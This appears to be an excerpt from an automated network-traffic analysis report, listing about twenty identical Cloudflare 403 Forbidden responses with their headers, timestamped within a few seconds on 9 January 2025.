Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:39 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wwJS4M0c3pQHOC1RRnsxTlzqM08Odd2CUReKFKjD4Wnblgv%2BY4sEVfbxGMu7mUPFxbldHqbbhvbwry6u2ZxWUZM%2BMUU%2FnZMZQLBL5rOkk6kmfUTv8Nla3p77BCa6BH7cGMZYetVbdwfdJa77"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3076c4e9e04-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2039&min_rtt=2038&rtt_var=766&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1426477&cwnd=236&unsent_bytes=0&cid=52ff64dd433384e0&ts=154&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:40 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UeNOmqUPOaiLkVey9exIdcf0d085Alo2RKODcHBLmOlRJhzZSWAkHZpVHMuAXH6xc8HOhYV%2FJFxXVFXB1bhnjBMsnTr0MM3cVFXZL5b2jLzWVH3Ov11wv%2FFL0wpD9SIFyI%2FW%2BUcGZQdGL7Pb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c30c3b397ca0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1977&rtt_var=748&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1457813&cwnd=174&unsent_bytes=0&cid=23c2865aaee5d47e&ts=292&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:40 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PVFxuSl0yJUMmskoUkYerxStlDod9fb2xW4a3dQuxRZwu6VivmwHiwco%2FUjNwiAV3YEpBA15ZJAgChRh8zXZMxAHCsfuEq3LpFXgdf%2BSZmdMASnye%2Fdu%2BAtAv5lV%2Bgyv0UtDr0hv9o1h8BS5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c30fdde842d3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1612&rtt_var=608&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1795817&cwnd=246&unsent_bytes=0&cid=884e6ecc0683f9b8&ts=121&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:41 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QI4wmCIm13qp8ptebjlJkB6jogJKQpbXwFq7ggu7GDMSPoaz0diyc7KMBJd3eMluLus3ZzYEwkJIsV%2FApUxyWy80YFkaMd2mwrvuM9Mng5HWrIe%2BpuO%2FbsEqySx5cGrpu%2FnVIEVudsrgAnRS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c313e90c0f6b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1629&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1751649&cwnd=210&unsent_bytes=0&cid=53114d47ddc7a59e&ts=155&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:42 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J6uxKQUnvCFqtOTKgvn9FnhB0fxJsrE%2FUsefBT5w4iFA7AF5T%2FCtZYHq79TRCpkugEJrugllEosk%2Fwk%2B0p8iqX%2BMYtooQWmZBXxbY4Ak%2B621tpwEDlHjqYwSGvBOfJnDx5H%2FFp6d%2BMkI7G1f"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c317ebb40ca0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1481&rtt_var=563&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1931216&cwnd=239&unsent_bytes=0&cid=a0de1b244e64acff&ts=153&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:42 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iT6nG6aTxCqWoi2gVGA9kOL9ZuJyqPj7gXbSn3CeDFxnNl51XmOaRhh9NPFCisJL%2FLog6YGynY90OK8yAWSDYabkQ0QVJr7rrWnZJLD%2B%2BRsYfgHss0J923KhIrWAUk3dj04uOHR%2BoYtXauP%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c31bbec0431b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2098&min_rtt=2089&rtt_var=790&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1397797&cwnd=178&unsent_bytes=0&cid=b95d1dfa5cbe1433&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:43 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jj5odEXtXXUu2tJOAG%2B7axE8zvFuQlijbKmHfC2jcf%2BO9hcTSB%2FGNxGkaNGcVyVK%2Fx4LI1QkKbEHuuZPNX%2B09Uzsq%2BXbAce8kMi6rg8ShVvoV2VHMTQsehZFqZOWLodlTPYhDKcZT3y%2Bsxpo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c31f7a7a72ab-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1993&rtt_var=760&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1427872&cwnd=208&unsent_bytes=0&cid=12d2a2bff07826bd&ts=139&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:43 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BNegD8Kk9KCEkSoyfNWPJ2Z911IwJRJ2Ss9DutaUiw2Q%2Foyx19eSpYNAFxoGtIifPpk3s6ojEsnyEfx3F%2F9JbYKkg2v3jut6vdeirNbnafrw%2F9Q1bEyFy0BF6OxeAOU%2F%2BArKTSN4X2WVfPJC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3235a444252-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1752&rtt_var=667&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1627647&cwnd=235&unsent_bytes=0&cid=17938a5f1d49bad1&ts=153&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:44 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pRahwmJlow8fImtDDG3mkpAU20EaV2ytmnaBrov1QA8RDfOYh15UiR3cvsq5eRH9B6UO93qkZlfgDK%2BG4uCk6jXlKkVEOZykv8DwQ8RuAnEP0E%2B25zm6ISWzMAktPWBmwJ3sZYvjuX9atIAP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3274b544257-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1716&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1673352&cwnd=215&unsent_bytes=0&cid=43d190fd77e12cf8&ts=155&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:45 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ThnVnaNdcCCh9TAVjJ8LmWlOgzjMNoL4ROKV0wsdIpGDLOvIbR8zRmi%2FnrWzmaaVuqGqbi5gREnmb%2BqviPZMTonGSzhTjAVRUqr8VvNt8OF29FqrZHq5SnGRuTVk%2Bbt3LcLYOU3NiW%2BJW%2FQp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c32b7b3b78ed-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1992&rtt_var=761&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1425085&cwnd=182&unsent_bytes=0&cid=eae91135a650ca57&ts=125&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:45 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=filGbz8dOL3xZEwiLKepLTAl%2FaedcpJKZOq906iEsAPG1gEQw4cvBSGfAZH9sGObwVexS%2Boq4zLgnVs3h0rPBS3%2Fvd0svePCjY%2BeQPmebhSjM1ntsYIw2nJDxh3eqyDavcOzKHqnRNsjhuj2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c32f4d1543df-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1602&rtt_var=608&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1788120&cwnd=243&unsent_bytes=0&cid=6ad311560e197c02&ts=136&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:46 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y6L%2FgTCLCmpUKirZKkrM3Ae1ppqCcxkb%2FCRITSmG2PzsvDbJ6kE93dcaO4c%2BguYHMADNLQTWdYa3ydDeQe5FFQMJZQJylwJTx4RlMtWwVnjsMbKvOKMsX4ZbJ4P38aGkOiVSaLirS%2Byp6dAp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c332fc07c33b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1515&rtt_var=577&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1927392&cwnd=171&unsent_bytes=0&cid=f6efcc483c1ad3b0&ts=139&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:46 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9xFfGhGUAMtFbRP8zAC1gcnNzLgSXjJb82CBawB%2FhBLaC3Q1v0x8ugnHJbWsDzu%2FcZ3BcOa0ZHbqzaH5yIvr%2BnShCOCr3I6B6UALcT0N09m4gZYcArqITkj9SJ1oiIIhlO7CVFRTA2zDL1j4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c336cabd6a59-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1712&rtt_var=656&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1650650&cwnd=246&unsent_bytes=0&cid=5712455c3440539e&ts=133&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:47 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FbkCova8lU%2FyR%2Bq4YIj58al%2BymTNy5%2BB0VREgyI%2FgQg%2FlNB9cJWBKVlVvcjJWIdXgIWUfENo4oPq2mNhCRsk8eNdhsZcNrFOvIT22fiWj6z3O1ClzRrrtN46T1p3G5jja3rjUX297bTHMg8J"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c33ab8c08c83-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1927&min_rtt=1918&rtt_var=737&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1466599&cwnd=189&unsent_bytes=0&cid=f5a6fd80a9889edd&ts=150&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:48 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hKlm04CAc0qQFATtAagPO1FfqLOmGXgaIfDwDALZjPxYJVlrZXlpSC4bz6SXS2pVOzP4a48dD%2B59cbBVg%2Bi%2FKGZ2B2pM%2FwAHdZwj4u1ZYoOsfNMKxj53lrcuec12TcRztg4waEFbd7KsjJaY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c33e9b514216-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1753&rtt_var=696&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1528795&cwnd=250&unsent_bytes=0&cid=0aa4717270b4ea13&ts=146&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:48 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5qb5cbVmh9vkMoMzeYx%2BGdmQOwUf%2BUwKNe64djCzzz5Wz%2BKUSmVpr%2B%2BPAemnAJwghww8pmutoulFEAYe1Ws5wTy0WewueHQR3P32dDZdSjU%2FjdogHkdeOUETBC6t4QH8KNfsIDO%2F%2FY5zw1jx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3423e485e6d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2006&rtt_var=762&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1427872&cwnd=252&unsent_bytes=0&cid=d952439b837e100a&ts=110&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:49 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ArlvBFJThXI%2FwzKqKAI12hYkNmzUuP2G75JVt0PR%2BapxqEcmwv3dQkdXZF2zd4PXbHeKPUoBLheuk417gW%2Fm4E7ijA1Co5hTy9Kos1n3dMb%2BP7d4T5sCyhpwPoXRf37H9Kuq0LdktHynbbWo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c345fdfc41f9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1712&rtt_var=653&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1662870&cwnd=216&unsent_bytes=0&cid=b2c883234a8e8bf7&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:50 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=af79oTByw4EswSzBBJNugpXM4bw3BlBdXDrMcPagfRoWnFa95%2FpKHwAlbZfnv%2B%2BJhIj60%2BIrRYkW%2BLg77N4VoByPJqZo50NVIcOWg8jm4wFg6Qc8l8rmGDnRObJsiRonr8MwXc2aWAZQuLEj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c349ecbdc46b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1549&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1821584&cwnd=229&unsent_bytes=0&cid=0b0135add03a02f0&ts=154&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:50 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GoWaOQFDJPrT2rBols69bjyk6hm7kHyqcO1MNfFCF0vyvEPXMTtR5kTqkxlxPG%2FxOT9ebospMXnsmbSbntvoY7tHTeW3mRfA0goTmShjQbVrjlJN%2BrAgGW2g9WnjHkug5hWmDBggfWSENEy%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c34dbd9d5e82-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1668&rtt_var=641&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1686886&cwnd=216&unsent_bytes=0&cid=35c01537a3d0f5a9&ts=137&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:51 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hlNIqaUBDYafaRUQaRXTWmlDEbehO9qZsPNQ8EyTTLulwFk8lxEswkbhhTkw0OX1QhUVXK44KBNpqdoj%2Bs2MsK3cR01gJB%2Ba%2F999zBVRBF9tVtsrn5Ld0uwW%2BaHEPOPevoh%2F3rN1GUqeYjxg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3518d940f9f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1464&min_rtt=1452&rtt_var=568&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1886304&cwnd=213&unsent_bytes=0&cid=663b4d3c929ac52c&ts=149&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:51 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hToihzjQRhSfR9YQ25uGjtu8Tx4%2BVGQJMT6UPnq7ECu2ijshw44f1rGV%2Bf0w7Wt5y5CRqqN6CZDX7%2BDqwXvTM2LI4K9mmHO5X8dwRCDLCyi%2FF6QYdJZbT2%2B8GOdP1%2BSxZfVZ9IQB5Jhseacw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c35549e20f95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1502&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1944074&cwnd=169&unsent_bytes=0&cid=df888c061cf95364&ts=138&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:52 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fjnC6fMX2CKDQQGjcZ1Qo9%2BersrVv32o4cuE5J0yNMqBvSRqt5q%2FzT%2FPsEqkexn%2FVG97Hr4vHyu4eh%2Fq5Rdg0NjkKPbBtoY%2FiUTtGCJZ2zO48QBN0UtJIdjzalZKXHQnVH4XZHuXXafXtOma"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c358ede10cc4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1512&min_rtt=1509&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1898569&cwnd=147&unsent_bytes=0&cid=c468518999fcd885&ts=131&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:53 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VSU3lV4%2Fyb52%2B%2FQLY1CqXPfUfIg%2BBEs2mkftgzfyl2UQ%2FYBBx3%2Bg4Lis%2Fd2Hi5ZOzDSAQ%2Bgt9Vtp%2B2TpMSYpyTk2rAyZBi0tePaTiC%2FwlUpZ0a5Bp5dYELnQNCK4TuVxGqHgO4bB3J7YmDBa"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c35ca9c44264-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1745&min_rtt=1738&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1624026&cwnd=223&unsent_bytes=0&cid=8ba5e4e1cad4febc&ts=147&x=0"
